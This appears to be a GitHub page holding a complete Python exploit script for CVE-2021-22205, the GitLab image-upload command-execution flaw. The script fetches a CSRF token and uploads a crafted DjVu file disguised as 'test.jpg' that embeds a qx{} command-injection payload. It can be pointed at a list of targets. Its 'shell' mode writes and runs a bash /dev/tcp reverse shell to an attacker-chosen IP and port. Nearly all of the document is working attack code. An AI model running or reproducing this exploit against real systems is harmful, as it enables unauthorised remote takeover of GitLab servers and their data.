-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathCVE-2021-22205.py
130 lines (110 loc) · 6.87 KB
/
CVE-2021-22205.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
# -*- coding: utf-8 -*-
'''
@Time : 2021/10/30 22:11
@Author : Seals6
@File : CVE-2021-22205.py
@contact: [email protected]
@blog: blog.seals6.top
'''
import argparse
import requests
import re
from bs4 import BeautifulSoup
requests.packages.urllib3.disable_warnings()
def loadFile(file):
list = [line.strip() for line in open(file, 'r')]
for i in range(0,len(list)):
if list[i][:4] != 'http':
list[i] = 'http://' + list[i]
return list
def unPoc1(url,command):
session = requests.Session()
#代理池配置
# proxies = {
# 'http': '127.0.0.1:8080',
# 'https': '127.0.0.1:8080'
# }
try:
r = session.get(url.strip("/") + "/users/sign_in", verify=False)
soup = BeautifulSoup(r.text, features="lxml")
token = soup.findAll('meta')[16].get("content")
data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{"+ command +"} . \\\n\" b \") ) \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n"
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
"Connection": "close",
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5",
"X-CSRF-Token": f"{token}",
"Accept-Encoding": "gzip, deflate"
}
Checkflag = 'Failed to process image'
req = session.post(url.strip("/") + "/uploads/user", data=data, headers=headers, verify=False)
#burp代理
# req = session.post(url.strip("/") + "/uploads/user", data=data, headers=headers, verify=False, proxies=proxies)
res = req.text
if Checkflag in res:
print("[+]%s gitlab存在未授权上传" %req.url)
print("[+]发送成功,请手动检查!")
else:
print("[-]faild!")
print("[-]%s 不存在未授权端口,请尝试注册新用户!" %req.url)
except Exception as e:
print(e)
def shell(url,rurl,rport):
session = requests.Session()
# 代理池配置
# proxies = {
# 'http': '127.0.0.1:8080',
# 'https': '127.0.0.1:8080'
# }
try:
r = session.get(url.strip("/") + "/users/sign_in", verify=False)
soup = BeautifulSoup(r.text, features="lxml")
token = soup.findAll('meta')[16].get("content")
payload=["echo 'bash -i >& /dev/tcp/%s/%s 0>&1' > /tmp/1.sh" % (rurl, rport),
"chmod +x /tmp/1.sh",
"/bin/bash /tmp/1.sh",]
data_list= []
for i in range(0,len(payload)):
command = payload[i]
data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{"+ command +"} . \\\n\" b \") ) \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n"
data_list.append(data)
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
"Connection": "close",
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5",
"X-CSRF-Token": f"{token}",
"Accept-Encoding": "gzip, deflate"
}
Checkflag = 'Failed to process image'
for i in range(0,len(data_list)):
req = session.post(url.strip("/") + "/uploads/user", data=data_list[i], headers=headers, verify=False)
#burp代理
# req = session.post(url.strip("/") + "/uploads/user", data=data_list[i], headers=headers, verify=False, proxies=proxies)
res = req.text
if Checkflag not in res:
print("[-]faild!")
print("[-]%s 不存在未授权端口,请尝试注册新用户!" % req.url)
else:
print("[+]反弹shell发送成功,请检查")
except Exception as e:
print(e)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="CVE-2021-22205")
parser.add_argument('-w', '--way', type=str, help="Exploit way unauthorized or reverse shell")
parser.add_argument('-u', '--url', type=str, help="url like http://127.0.0.1:8080")
parser.add_argument('-f', '--file', type=str, help="url file path")
parser.add_argument('-ri', '--reip', type=str, help="reverse ip")
parser.add_argument('-rp', '--report', type=str, help="reverse port")
args = parser.parse_args()
if args.way == 'un':
command = input("[+]请输入命令,默认不回显,请用dnslog进行测试:\n");
if args.url and args.file:
print("[-]wrong!url和file只能存在一个!")
elif args.url:
unPoc1(args.url,command)
else:
list = loadFile(args.file)
for i in list:
unPoc1(i,command)
elif args.way == 'shell':
shell(args.url,args.reip,args.report)